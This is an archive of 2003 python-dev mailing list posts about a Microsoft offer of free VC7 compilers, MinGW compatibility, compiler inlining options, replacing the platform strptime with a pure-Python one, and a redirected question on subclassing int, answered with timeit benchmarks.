From: tim.one@comcast.net (Tim Peters)
Date: Thu, 08 May 2003 17:56:32 -0400
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <3EBA418F.3020006@lemburg.com>
Message-ID: <BIEJKCLHCIOIHAGOKOLHCEONFJAA.tim.one@comcast.net>

[M.-A. Lemburg]
> ...
> Perhaps we should look at the offer in a different light...
>
> What advantage would the move from VC6 to VC7 give Python users ?

In general, smaller and faster code is a decent bet.  For those who use VC7
already, an easier life.  "Move" implies abandoning VC6, though, and I don't
think that's a realistic possibility now -- although over time it's
inevitable (VC6 is akin to Python 1.5.2 now:  beloved by some but
unsupported by all <wink>).



From tim_one@email.msn.com  Fri May  9 05:10:46 2003
From: tim_one@email.msn.com (Tim Peters)
Date: Fri, 9 May 2003 00:10:46 -0400
Subject: [Python-Dev] Make _strptime only time.strptime implementation?
In-Reply-To: <Pine.SOL.4.55.0305071511430.11630@death.OCF.Berkeley.EDU>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEFMEJAB.tim_one@email.msn.com>

[Brett Cannon]
> Someone filed a bug report wanting it to be mentioned that most libc
> implementations  of strptime don't handle %Z.  Michael asked whether
> _strptime was going to become the permanent version of time.strptime or
> not.  This was partially discussed back when Guido used his amazing time
> machine to make time.strptime use _strptime exclusively for testing
> purposes.
>
> I vaguely remember Tim saying he supported moving to _strptime, but I
> don't remember Guido having an opinion.  If this is going to happen for
> 2.3 I would like to know so as to fix the documentation to be better.

As we left it, we were going to wait for the 2.3 alpha and beta testers to
raise a stink if the new implementation didn't work out for them (you'll
recall that the call to the platform strptime() is disabled in 2.3b1, via an
unconditional

#undef HAVE_STRPTIME

in timemodule.c).  Nobody has even cut a little gas yet, so I'd proceed
under the assumption that nobody will, and that the disabled HAVE_STRPTIME
code will be physically deleted.  If that turns out to be wrong, big deal,
you stay up all night fixing it under intense pressure <wink>.



From tim_one@email.msn.com  Fri May  9 05:17:59 2003
From: tim_one@email.msn.com (Tim Peters)
Date: Fri, 9 May 2003 00:17:59 -0400
Subject: [Python-Dev] Microsoft speedup
In-Reply-To: <Xns9374933CC2E5Cduncanrcpcouk@127.0.0.1>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEFMEJAB.tim_one@email.msn.com>

[Duncan Booth]
> I was just playing around with the compiler options using
> Microsoft VC6 and
> I see that adding the option /Ob2 speeds up pystone by about 2.5%
> (/Ob2 is the option to automatically inline functions where the compiler
> thinks it is worthwhile.)
>
> The downside is that it increases the size of python23.dll by about 13%.
>
> It's not a phenomenal speedup, but it should be pretty low impact if the
> extra size is considered a worthwhile tradeoff.

I want to see much broader testing first.  A couple employers ago, we
disabled all magical inlining options, because sometimes they made critical
loops faster, and sometimes slower, and you couldn't guess which as the code
changed, and in that problem domain (speech recognition) the critical loops
were truly critical so we were acutely aware of compiled-code speed
regressions.  So I'm not discouraged <wink> that pystone sped up when you
tried it, but not particularly encouraged either.

I expect it's more worth trying in Python, as hardly any code in Python goes
three lines without a function call or conditional branch.



From python-list@python.org  Fri May  9 08:49:33 2003
From: python-list@python.org (Alex Martelli)
Date: Fri, 9 May 2003 09:49:33 +0200
Subject: [Python-Dev] Subclassing int? [Was: Re: [PEP] += on return of function call result]
In-Reply-To: <20030508202012.GA3809@bolli.homeip.net>
References: <20030508202012.GA3809@bolli.homeip.net>
Message-ID: <200305090949.33064.aleax@aleax.it>

Followups set to python-list since this is NOT an appropriate subject matter
for python-dev.  Please continue the discussion on python-list, thanks.

On Thursday 08 May 2003 10:20 pm, Beat Bolli wrote:
   ...
>         count = {}
>         for word in wordlist:
>             count.setdefault(word, 0) += 1
>
> This, as I soon realized, didn't work, exactly because ints are immutable.

Actually it doesn't work because you cannot assign to a function call; the
fact that ints are immutable doesn't enter the picture.

> 	class Counter(int):
> 	    def inc(self):
>                 # to be defined
>                 self += 1??

HERE is where the fact that ints are immutable will bite.  If += mutated
self, this would work -- but it doesn't because ints are immutable.

> As you can see, I have a problem at the comment: how do I access the
> inherited int value??? I realized that this also wasn't going to work,

int(self) will "access the inherited int value" if I understand your meaning.
But it doesn't help you here.

> either. I finally used the perhaps idiomatic
>
>         count = {}
>         for word in wordlist:
>             count[word] = count.get(word, 0) + 1
>
> which of course is suboptimal, because the lookup is done twice. I decided

Yes.

> not to implement a proper Counter class for memory efficiency reasons. The

__slots__ fix your memory efficiency issues: that's the REASON they exist.
However, there's ANOTHER problem...:

> code would have been simple:
>
>         class Counter:
>             def __init__(self):
>                 self.n = 0
>             def inc(self):
>                 self.n += 1
>             def get(self):
>                 return self.n
>
>         count = {}
>         for word in wordlist:
>             count.setdefault(word, Counter()).inc()
>
> But to restate the core question: can class Counter be written as a
> subclass of int?

No (not meaningfully).
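
A tiny illustration of why (the word list is made up): since ints are
immutable, an inc() on an int subclass can only hand back a *new* object;
the one that setdefault() already stored in the dict never changes:

    class Counter(int):
        def inc(self):
            return Counter(int(self) + 1)   # a brand-new object

    count = {}
    for word in "some are and some are not".split():
        count.setdefault(word, Counter()).inc()   # result is thrown away

    print count   # every value is still 0 -- nothing was counted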

The performance tradeoff is tricky not because of memory considerations (which
__slots__ fix) but because you're generating (and often throwing away) a 
Counter instance EVERY time.  Witness:

[alex@lancelot Lib]$ python timeit.py -s'''
count = {}
words = "some are and some are not and some are irksome".split()
''' 'for w in words:'  '  count[w]=count.get(w,0)+1'
100000 loops, best of 3: 11.6 usec per loop

versus:

[alex@lancelot Lib]$ python timeit.py -s'''
count = {}
words = "some are and some are not and some are irksome".split()
class Cnt(object):
  __slots__=["n"]
  def __init__(self): self.n=0
  def inc(self): self.n+=1
''' 'for w in words:'  '  count.setdefault(w,Cnt()).inc()'
10000 loops, best of 3: 43.4 usec per loop

See?  It's not a speedup, but a slowdown by about FOUR times in this
example.

If you want speed, go for speed:

[alex@lancelot Lib]$ python timeit.py -s'''
count = {}
words = "some are and some are not and some are irksome".split()
import psyco
psyco.full()
''' 'for w in words:'  '  count[w]=count.get(w,0)+1'
100000 loops, best of 3: 3.33 usec per loop

Now THIS is acceleration -- a speedup of over THREE times.  And without
any complication, and without abandoning the idiomatic way of expressing it.
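
For completeness, there is also the try/except variant some people use
to avoid the double lookup -- just a sketch, and whether it beats
dict.get depends on how often keys repeat, so measure it with timeit.py
on your own data:

    count = {}
    words = "some are and some are not and some are irksome".split()
    for w in words:
        try:
            count[w] += 1      # one lookup when the key already exists
        except KeyError:
            count[w] = 1       # first occurrence pays for the exception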

> Beat Bolli (please CC: me on replys, I'm not on the list)

Done.  But please use python-list for these discussions: python-dev is only
for discussion about development of *Python itself*.


Alex



From duncan@rcp.co.uk  Fri May  9 09:19:28 2003
From: duncan@rcp.co.uk (Duncan Booth)
Date: Fri, 09 May 2003 09:19:28 +0100
Subject: [Python-Dev] Microsoft speedup
In-Reply-To: <LNBBLJKPBEHFEDALKOLCMEFMEJAB.tim_one@email.msn.com>
References: <Xns9374933CC2E5Cduncanrcpcouk@127.0.0.1>
Message-ID: <3EBB72A0.5651.54D47C4@localhost>

On 9 May 2003 at 0:17, Tim Peters wrote:

> [Duncan Booth]
> > It's not a phenomenal speedup, but it should be pretty low impact if the
> > extra size is considered a worthwhile tradeoff.
> 
> I want to see much broader testing first.  A couple employers ago, we
> disabled all magical inlining options, because sometimes they made critical
> loops faster, and sometimes slower, and you couldn't guess which as the code
> changed, and in that problem domain (speech recognition) the critical loops
> were truly critical so we were acutely aware of compiled-code speed
> regressions.  So I'm not discouraged <wink> that pystone sped up when you
> tried it, but not particularly encouraged either.

I'm not suggesting Guido rush out and change the options right 
now, but I wanted to know whether it would be worth looking at 
this further. For all I know it's been discussed and dismissed 
already, in which case there isn't much point in my looking at 
it further. Also, if the main distribution should move to 
VC7, then it would probably be better to check whether this 
sort of micro-tweaking has any effect there before wasting 
time on it. 

I've had plenty of experience myself of changing Microsoft 
compiler options and finding that the code then breaks, so I agree 
that it would need much more testing. It also needs more 
testing to see whether it makes any kind of difference to real 
programs as well as benchmarks. If I knew any way to get the 
compiler to tell me which functions it inlined, then it would 
probably also be possible to get most of the speedup by 
explicitly inlining a few functions and avoiding most of the 
hit on the code size.

-- 
Duncan Booth                                     
duncan@rcp.co.uk
int month(char *p){return(124864/((p[0]+p[1]-
p[2]&0x1f)+1)%12)["\5\x8\3"
"\6\7\xb\1\x9\xa\2\0\4"];} // Who said my code was obscure?
http://dales.rmplc.co.uk/Duncan



From mal@lemburg.com  Fri May  9 10:28:37 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Fri, 09 May 2003 11:28:37 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHCEONFJAA.tim.one@comcast.net>
References: <BIEJKCLHCIOIHAGOKOLHCEONFJAA.tim.one@comcast.net>
Message-ID: <3EBB74C5.7090600@lemburg.com>

Tim Peters wrote:
> [M.-A. Lemburg]
> 
>>...
>>Perhaps we should look at the offer in a different light...
>>
>>What advantage would the move from VC6 to VC7 give Python users ?
> 
> In general, smaller and faster code is a decent bet.  For those who use VC7
> already, an easier life.  "Move" implies abandoning VC6, though, and I don't
> think that's a realistic possibility now -- although over time it's
> inevitable (VC6 is akin to Python 1.5.2 now:  beloved by some but
> unsupported by all <wink>).

True :-)

How about adding support for VC7 features in 2.4 and starting the
transition in 2.5 ?

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Software directly from the Source  (#1, May 09 2003)
 >>> Python/Zope Products & Consulting ...         http://www.egenix.com/
 >>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________
EuroPython 2003, Charleroi, Belgium:                        46 days left



From mal@lemburg.com  Fri May  9 10:29:57 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Fri, 09 May 2003 11:29:57 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <3EBB74C5.7090600@lemburg.com>
References: <BIEJKCLHCIOIHAGOKOLHCEONFJAA.tim.one@comcast.net> <3EBB74C5.7090600@lemburg.com>
Message-ID: <3EBB7515.2090709@lemburg.com>

M.-A. Lemburg wrote:
> How about adding support for VC7 features in 2.4 and starting the
> transition in 2.5 ?

This would also allow MS to ship SP2 for VC7 by then ;-)

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Software directly from the Source  (#1, May 09 2003)
 >>> Python/Zope Products & Consulting ...         http://www.egenix.com/
 >>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________
EuroPython 2003, Charleroi, Belgium:                        46 days left



From drifty@alum.berkeley.edu  Fri May  9 10:31:26 2003
From: drifty@alum.berkeley.edu (Brett Cannon)
Date: Fri, 9 May 2003 02:31:26 -0700 (PDT)
Subject: [Python-Dev] Make _strptime only time.strptime implementation?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCEFMEJAB.tim_one@email.msn.com>
References: <LNBBLJKPBEHFEDALKOLCCEFMEJAB.tim_one@email.msn.com>
Message-ID: <Pine.SOL.4.55.0305090229430.21553@death.OCF.Berkeley.EDU>

[Tim Peters]

> As we left it, we were going to wait for the 2.3 alpha and beta testers to
> raise a stink if the new implementation didn't work out for them (you'll
> recall that the call to the platform strptime() is disabled in 2.3b1, via an
> unconditional
>
> #undef HAVE_STRPTIME
>
> in timemodule.c).  Nobody has even cut a little gas yet,

I got a single email from someone asking me to change the functionality so
that it would raise an exception if part of the input string was not
parsed.  Otherwise I found one error and dealt with it.

> so I'd proceed under the assumption that nobody will, and that the
> disabled HAVE_STRPTIME code will be physically deleted.  If that turns out
> to be wrong, big deal, you stay up all night fixing it under intense
> pressure <wink>.
>

OK.  If by 2.3b2 no one has said anything I will go ahead and cut out the
C code and update the docs.

-Brett


From jacobs@penguin.theopalgroup.com  Fri May  9 11:30:45 2003
From: jacobs@penguin.theopalgroup.com (Kevin Jacobs)
Date: Fri, 9 May 2003 06:30:45 -0400 (EDT)
Subject: [Python-Dev] Make _strptime only time.strptime implementation?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCEFMEJAB.tim_one@email.msn.com>
Message-ID: <Pine.LNX.4.44.0305090626590.3645-100000@penguin.theopalgroup.com>

On Fri, 9 May 2003, Tim Peters wrote:
> As we left it, we were going to wait for the 2.3 alpha and beta testers to
> raise a stink if the new implementation didn't work out for them (you'll
> recall that the call to the platform strptime() is disabled in 2.3b1, via an
> unconditional
> 
> #undef HAVE_STRPTIME
> 
> in timemodule.c).  Nobody has even cut a little gas yet, so I'd proceed
> under the assumption that nobody will, and that the disabled HAVE_STRPTIME
> code will be physically deleted.  If that turns out to be wrong, big deal,
> you stay up all night fixing it under intense pressure <wink>.

Actually, I did, and on python-dev.  strptime did not roundtrip correctly
with mktime on Linux.  This made my application very unhappy, so I removed
all calls to strptime. Right now I don't have a vested interest in shooting
holes in the Python strptime, but I can't say I feel any warm fuzzies about
it.  It seems hard to imagine that others will not run into similar
problems, regardless of the lack of specification for exactly how strptime
ought to work.

-Kevin

-- 
--
Kevin Jacobs
The OPAL Group - Enterprise Systems Architect
Voice: (216) 986-0710 x 19         E-mail: jacobs@theopalgroup.com
Fax:   (216) 986-0714              WWW:    http://www.theopalgroup.com



From gsw@agere.com  Fri May  9 13:47:49 2003
From: gsw@agere.com (Williams, Gerald S (Jerry))
Date: Fri, 9 May 2003 08:47:49 -0400
Subject: [Python-Dev] MS VC 7 offer
Message-ID: <937756AF9E0BDC4396C09F32D8B41F2B2FE238@pauex2ku01.agere.com>

Paul Moore wrote:
> One further data point - the free mingw gcc compiler generates
> binaries which depend on msvcrt.dll. So, if the Pythonlabs
> distribution switches to MSVC7, developers using MSVC6 *and*
> developers using mingw will be unable to build compatible extensions. 
> The only compatible compiler will be MSVC7 (either the paid for
> version or the free limited version).

Are there any reasons why we can't just switch to MINGW
instead? If the VC7 RT is the way of the future, then
presumably MINGW will eventually support it. If not, it
might be better to avoid VC7 anyway. :-)

gsw


From Paul.Moore@atosorigin.com  Fri May  9 13:57:58 2003
From: Paul.Moore@atosorigin.com (Moore, Paul)
Date: Fri, 9 May 2003 13:57:58 +0100
Subject: [Python-Dev] MS VC 7 offer
Message-ID: <16E1010E4581B049ABC51D4975CEDB880113DACF@UKDCX001.uk.int.atosorigin.com>

From: Williams, Gerald S (Jerry) [mailto:gsw@agere.com]
> Are there any reasons why we can't just switch to MINGW
> instead? If the VC7 RT is the way of the future, then
> presumably MINGW will eventually support it. If not, it
> might be better to avoid VC7 anyway. :-)

I've asked on the mingw users list about VC7 compatibility.
It's quite possible that the msvcr71.dll EULA conditions
will make this a non-starter, though (I don't understand
them, but they sound scary...)

Paul.


From gh@ghaering.de  Fri May  9 14:06:00 2003
From: gh@ghaering.de (=?ISO-8859-1?Q?Gerhard_H=E4ring?=)
Date: Fri, 09 May 2003 15:06:00 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <937756AF9E0BDC4396C09F32D8B41F2B2FE238@pauex2ku01.agere.com>
References: <937756AF9E0BDC4396C09F32D8B41F2B2FE238@pauex2ku01.agere.com>
Message-ID: <3EBBA7B8.6030309@ghaering.de>

Williams, Gerald S (Jerry) wrote:
> Paul Moore wrote:
> 
>>One further data point - the free mingw gcc compiler generates
>>binaries which depend on msvcrt.dll. So, if the Pythonlabs
>>distribution switches to MSVC7, developers using MSVC6 *and*
>>developers using mingw will be unable to build compatible extensions. 
>>The only compatible compiler will be MSVC7 (either the paid for
>>version or the free limited version).
> 
> Are there any reasons why we can't just switch to MINGW
> instead?

Yes. Several:

1) Python can't be built with MINGW, yet. I'm working on it, and so are 
other people, apparently (search python-list).

2) The Microsoft IDE is a more productive development environment for 
those that develop Python on Windows. I'm not sure, but my uneducated 
guess is that there are only a few Python developers who do any 
significant work on the win32 side; I only know of Guido, Tim, and Mark. 
Those that actually put Python forward on win32 should decide about 
their development environment, IMO.

My guess is that MINGW will eventually be a supported platform, but not 
the primary method of building Python.

FWIW, Mozilla recently (1.4 beta 1) became compilable with mingw on win32. 
They're calling mingw a "tier 3" platform, while MSVC is a "tier 1" 
platform. I haven't looked up the terms, but I guess that "tier 3" means 
"nice to have" for a realease, while "tier 1" means "must have".

I reckon the situation will be similar for Python once it gains 
mingw support.

> If the VC7 RT is the way of the future, then
> presumably MINGW will eventually support it. [...]

"Eventually" being the keyword here.

-- Gerhard


From Paul.Moore@atosorigin.com  Fri May  9 14:09:47 2003
From: Paul.Moore@atosorigin.com (Moore, Paul)
Date: Fri, 9 May 2003 14:09:47 +0100
Subject: [Python-Dev] MS VC 7 offer
Message-ID: <16E1010E4581B049ABC51D4975CEDB880113DAD1@UKDCX001.uk.int.atosorigin.com>

From: Moore, Paul
> I've asked on the mingw users list about VC7 compatibility.
> It's quite possible that the msvcr71.dll EULA conditions
> will make this a non-starter, though (I don't understand
> them, but they sound scary...)

FWIW, I just got a reply from the mingw list. Because msvcrt
is distributed with the OS, and msvcr7 is not, GPL
compatibility becomes an issue. Specifically, mingw exploits
a specific clause in the GPL which allows dependencies on
"components of the OS". MSVCRT qualifies here, but MSVCR7
doesn't. So I don't think mingw will support building DLLs
which use MSVCR7 for the foreseeable future :-(

Paul.


From tim@zope.com  Fri May  9 15:30:34 2003
From: tim@zope.com (Tim Peters)
Date: Fri, 9 May 2003 10:30:34 -0400
Subject: [Python-Dev] Make _strptime only time.strptime implementation?
In-Reply-To: <Pine.LNX.4.44.0305090626590.3645-100000@penguin.theopalgroup.com>
Message-ID: <BIEJKCLHCIOIHAGOKOLHAEBIFKAA.tim@zope.com>

[Tim]
>> Nobody has even cut a little gas yet, so I'd proceed under the
>> assumption that nobody will, and that the disabled HAVE_STRPTIME
>> code will be physically deleted.

[Kevin Jacobs]
> Actually, I did, and on python-dev.

Sorry, I meant since 2.3b1 was released.  It's the purpose of pre-releases
to find problems, and the whineometer gets reset when a new pre-release goes
out.

> strptime did not roundtrip correctly with mktime on Linux.

It was my understanding (possibly wrong, and please correct me if it is)
that Brett fixed this.

> This made my application very unhappy, so I removed all calls to
> strptime.  Right now I don't have a vested interest in shooting
> holes in the Python strptime, but I can't say I feel any warm
> fuzzies about it.  It seems hard to imagine that others will not run
> into similar problems, regardless of the lack of specification for
> exactly how strptime ought to work.

The primary problem isn't the lack of a crisp spec, although that's the root
cause of the real problem:  the problem is that how strptime behaves varies
in fact across boxes.  I don't expect anyone could have felt warm fuzzies
about that either, although someone could fool themself into hoping that the
platform strptime behavior they happened to get was the only behavior their
app would ever see.  With a single implementation of strptime across
platforms, that pleasant fantasy gets close to becoming the truth.  Python
is supposed to be a *little* less platform-dependent than C <wink>.
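
For example, a little sketch like this should now give the same answer
on every box (the all-numeric format keeps locale out of the picture):

    import time
    t = time.strptime("2003-05-10 22:46:18", "%Y-%m-%d %H:%M:%S")
    print t[:6]    # (2003, 5, 10, 22, 46, 18) regardless of platform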



From guido@python.org  Fri May  9 15:38:09 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 09 May 2003 10:38:09 -0400
Subject: [Python-Dev] Make _strptime only time.strptime implementation?
In-Reply-To: "Your message of Fri, 09 May 2003 02:31:26 PDT."
 <Pine.SOL.4.55.0305090229430.21553@death.OCF.Berkeley.EDU>
References: <LNBBLJKPBEHFEDALKOLCCEFMEJAB.tim_one@email.msn.com>
 <Pine.SOL.4.55.0305090229430.21553@death.OCF.Berkeley.EDU>
Message-ID: <200305091438.h49Ec9K08904@pcp02138704pcs.reston01.va.comcast.net>

> I got a single email from someone asking me to change the
> functionality so that it would raise an exception if part of the
> input string was not parsed.

That sounds like a good idea on the face of it.  Or will this break
existing code?

--Guido van Rossum (home page: http://www.python.org/~guido/)




From jacobs@penguin.theopalgroup.com  Fri May  9 15:48:28 2003
From: jacobs@penguin.theopalgroup.com (Kevin Jacobs)
Date: Fri, 9 May 2003 10:48:28 -0400 (EDT)
Subject: [Python-Dev] Make _strptime only time.strptime implementation?
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHAEBIFKAA.tim@zope.com>
Message-ID: <Pine.LNX.4.44.0305091042030.5143-100000@penguin.theopalgroup.com>

On Fri, 9 May 2003, Tim Peters wrote:
> > strptime did not roundtrip correctly with mktime on Linux.
> 
> It was my understanding (possibly wrong, and please correct me if it is)
> that Brett fixed this.

I've just retested with my original code and it does look like Brett has
indeed fixed it.  Or at least fixed it to the point that mktime doesn't
croak on Linux, Solaris, Tru64, and IRIX with our app.

> The primary problem isn't the lack of a crisp spec, although that's the root
> cause of the real problem:  the problem is that how strptime behaves varies
> in fact across boxes.

Or more importantly that strptime is now standardized in Python, while
mktime is not.

Given that my previous problems with the Python strptime have been
addressed, I am now +1 on using it (although I'm still going to avoid it and
mktime in my code as much as possible).

-Kevin

-- 
--
Kevin Jacobs
The OPAL Group - Enterprise Systems Architect
Voice: (216) 986-0710 x 19         E-mail: jacobs@theopalgroup.com
Fax:   (216) 986-0714              WWW:    http://www.theopalgroup.com



From gsw@agere.com  Fri May  9 17:12:57 2003
From: gsw@agere.com (Williams, Gerald S (Jerry))
Date: Fri, 9 May 2003 12:12:57 -0400
Subject: [Python-Dev] MS VC 7 offer
Message-ID: <937756AF9E0BDC4396C09F32D8B41F2B2FE23B@pauex2ku01.agere.com>

There'll always be pressure to use VC for interoperability
reasons. Some would attribute this to FUD. I'm not ready to
go that far.

My personal (admittedly probably controversial) preference
would be to eventually drop VC support entirely in favor of
existing free optimizing compilers. Of course, if Microsoft
makes an optimizing compiler available for free to everyone,
it would make this position much more difficult to maintain.
Surprisingly, it sounds like the latter may be more likely
than the former.

If Python is moving toward VC7, I'd like to be counted in
for a copy. I'd rather not switch, but it sounds like I'd
have to, especially if there are legal issues with the VC7
runtime libraries.

Gerhard Häring wrote:
> 1) Python can't be built with MINGW, yet. I'm working on it,
> and so are other people, apparently (search python-list).

Good point. We don't know the full extent of the issues yet.

> 2) The Microsoft IDE is a more productive development environment for
> those that develop Python on Windows.

I'm not going to tell anyone that they can't use their IDE
of choice, but keep in mind that IDE != compiler. Setting
up project files to use different build tools isn't hard.
If you're concerned about VC-specific debug information,
you could still use VC for debug builds.

gsw


From martin@v.loewis.de  Fri May  9 17:28:09 2003
From: martin@v.loewis.de (=?ISO-8859-1?Q?=22Martin_v=2E_L=F6wis=22?=)
Date: Fri, 09 May 2003 18:28:09 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <937756AF9E0BDC4396C09F32D8B41F2B2FE23B@pauex2ku01.agere.com>
References: <937756AF9E0BDC4396C09F32D8B41F2B2FE23B@pauex2ku01.agere.com>
Message-ID: <3EBBD719.7040209@v.loewis.de>

Williams, Gerald S (Jerry) wrote:

> My personal (admittedly probably controversial) preference
> would be to eventually drop VC support entirely in favor of
> existing free optimizing compilers. 

You make it sound as if compilers are a religion.
They are tools, and what matters is how well they cooperate with Python on 
a given system. They are not competitors, so you can make Python cooperate 
with existing free optimizing compilers and simultaneously support VC.

> Of course, if Microsoft
> makes an optimizing compiler available for free to everyone,
> it would make this position much more difficult to maintain.

Your position is already difficult to maintain. He who makes the release 
chooses the tool. This is free software: If you don't like that release, 
make a different one.

> If Python is moving toward VC7, I'd like to be counted in
> for a copy. 

Python is not moving towards or away from a specific product. If it is 
moving at all, it is moving towards ISO C99. We are talking about the 
PythonLabs Windows installer, not about "Python".

> I'm not going to tell anyone that they can't use their IDE
> of choice, but keep in mind that IDE != compiler. Setting
> up project files to use different build tools isn't hard.
> If you're concerned about VC-specific debug information,
> you could still use VC for debug builds.

Somebody will have to maintain the VC makefiles. That somebody won't 
simultaneously maintain a MingW infrastructure, because of time 
constraints. So to use a MingW release process, we would need a 
volunteer to produce such a release. Do you volunteer?

Regards,
Martin




From gsw@agere.com  Fri May  9 18:43:29 2003
From: gsw@agere.com (Williams, Gerald S (Jerry))
Date: Fri, 9 May 2003 13:43:29 -0400
Subject: [Python-Dev] MS VC 7 offer
Message-ID: <937756AF9E0BDC4396C09F32D8B41F2B2FE23C@pauex2ku01.agere.com>

Martin v. Löwis wrote:
> You make it sound as if compilers are a religion.

Hardly intended, but when Microsoft (and the FSF) are
involved, somehow religious wars often pop up. :-)

> > If Python is moving toward VC7, [...]
>
> Python is not moving towards or away from a specific product [...]
> We are talking about the PythonLabs Windows installer,

You are correct. Replace "Python" with "the PythonLabs
Windows installer".

> Somebody will have to maintain the VC makefiles. That somebody won't
> simultaneously maintain a MingW infrastructure, because of time
> constraints. So to use a MingW release process, we would need a
> volunteer to produce such a release. Do you volunteer?

Not today, maybe tomorrow. I'm already maintaining the
SWIG package for Cygwin and not putting as much time
into that as I should. Plus I have a new public domain
project on SourceForge that I'm trying to get off the
ground.

I appreciate the need for having somebody actually do
the work (especially the initial port). I'm glad to
hear a few people are already working on this one.

gsw


From tim.one@comcast.net  Fri May  9 20:08:44 2003
From: tim.one@comcast.net (Tim Peters)
Date: Fri, 09 May 2003 15:08:44 -0400
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <3EBB74C5.7090600@lemburg.com>
Message-ID: <BIEJKCLHCIOIHAGOKOLHEEDBFKAA.tim.one@comcast.net>

[M.-A. Lemburg]
> How about adding support for VC7 features in 2.4

AFAIK, current CVS Python compiles under VC7 now.

> and starting the transition in 2.5 ?

I expect that mostly depends on who's doing the work.  PLabs Windows
development is on auto-pilot (aka benign neglect).  The first person to
volunteer time to do anything here gets to set the policy for the next two
decades <0.9 wink>.



From mal@lemburg.com  Fri May  9 21:15:23 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Fri, 09 May 2003 22:15:23 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHEEDBFKAA.tim.one@comcast.net>
References: <BIEJKCLHCIOIHAGOKOLHEEDBFKAA.tim.one@comcast.net>
Message-ID: <3EBC0C5B.7030101@lemburg.com>

Tim Peters wrote:
> [M.-A. Lemburg]
> 
>>How about adding support for VC7 features in 2.4
> 
> AFAIK, current CVS Python compiles under VC7 now.

That's nice :-) I meant: adding features from VC7 to Python.

>>and starting the transition in 2.5 ?
> 
> I expect that mostly depends on who's doing the work.  PLabs Windows
> development is on auto-pilot (aka benign neglect).  The first person to
> volunteer time to do anything here gets to set the policy for the next two
> decades <0.9 wink>.

How come ? I always thought that Zope's main deployment platform
is Windows....

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Software directly from the Source  (#1, May 09 2003)
 >>> Python/Zope Products & Consulting ...         http://www.egenix.com/
 >>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________
EuroPython 2003, Charleroi, Belgium:                        46 days left



From guido@python.org  Fri May  9 21:32:05 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 09 May 2003 16:32:05 -0400
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: Your message of "Tue, 06 May 2003 18:06:11 EDT."
Message-ID: <200305092032.h49KW5B11937@pcp02138704pcs.reston01.va.comcast.net>

Here's a reply from Nick Hodapp.  In a later email he also said:

> And I wouldn't dream of giving you Standard ;)
> 
> Today the C++ optimizer is NOT in the freely available tools.  We
> are fixing this, but the timeframe is uncertain.

My own suggestion: let's ask for copies for the lead Windows
developers who are distributing Windows binaries of core Python (that
would be Tim & me) or major addons (several have been mentioned here).

Then we can see how well this works, and together we can agree on a
"sunset date" for the VC6-based installer.  If you feel you qualify or
you know someone who you think qualifies, send me *private* email.

--Guido van Rossum (home page: http://www.python.org/~guido/)

> From: "Nick Hodapp"
> To: "Guido van Rossum"
> Date: Thu, 8 May 2003 17:28:45 -0700
> 
> Guido --
> 
> I read much of the archived thread.  I'll respond here in email:
> 
> 1)  There was confusion about which version of Visual C++.  The version
> that I'm willing to donate to core Python developers is the most recent,
> Visual C++ .NET 2003, aka. VC 7.1.  I don't fully understand how many
> "core developers" there are, but let's cap my gift at 10 copies.  
> 
> 2)  There was a question about how quickly I could provide the licenses,
> and whether I would give media or cash.  I'd be providing boxed copies
> of the product (likely our "Professional" edition) and recipients would
> likely have to wait a month or so since we're not yet stocked
> internally.  
> 
> 3)  There was a question about redistributing the C-runtime DLLs.  While
> Microsoft recommends redistributing these using "merge modules" to
> prevent versioning issues, this is not mandatory.  From the product
> documentation:
> 
> "Visual Studio .NET provides its redistributable files in the form of
> merge modules. These merge modules encapsulate the redistributable DLLs
> and can be used by setup projects or other redistribution tools. Using
> the merge modules ensures that the correct files are redistributed with
> an application. However, if your installer does not support distributing
> merge modules, you can redistribute the DLLs embedded in the merge
> modules. You need to either extract the DLLs from the merge modules or
> get them from the product CD or DVD. Do not copy files from your hard
> disk."
> 
> Also, you can statically bind to the C-runtime to avoid this issue
> entirely.
> 
> 4)  Several questions regarding the build system.  What features you
> make use of are entirely up to you.  Know that VC7 and VC7.1 do not
> support the "export makefile" feature that is in VC6.  My recommendation
> would be to use the VC build system, but that is personal taste.  Allow
> me to hint that a command-line-tool version of the build/project system
> is likely to be made available for free in the near future.  But that is
> just a hint, not a promise.
> 
> 5)  Several questions about binary compatibility of object files.   I
> don't believe we broke binary compatibility for linking (you should be
> able to link a VC6 object file with a VC7.1 generated object module).
> I'll follow up and get a confirmation.  We did break binary
> compatibility -- on purpose -- for some of the libraries, including MFC.
> I doubt you guys use MFC.
> 
> 
> The kind of feedback on the thread you sent is great -- I can use it as
> input for how we design and package future product.  My sole intent here
> is to provide our new tool to some influential C++ developers in the
> community.  I've made the same offer to the Boost community.  
> 
> I'm also willing to help figure out if we can build Python completely
> with the freely available SDK tools I mentioned.  I don't know if this
> is possible, but it would be fun to try -- and a plus for your community
> if we succeed.  
> 
> 
> Nick


From martin@v.loewis.de  Fri May  9 21:54:25 2003
From: martin@v.loewis.de (=?ISO-8859-1?Q?=22Martin_v=2E_L=F6wis=22?=)
Date: Fri, 09 May 2003 22:54:25 +0200
Subject: [Python-Dev] MS VC 7 offer
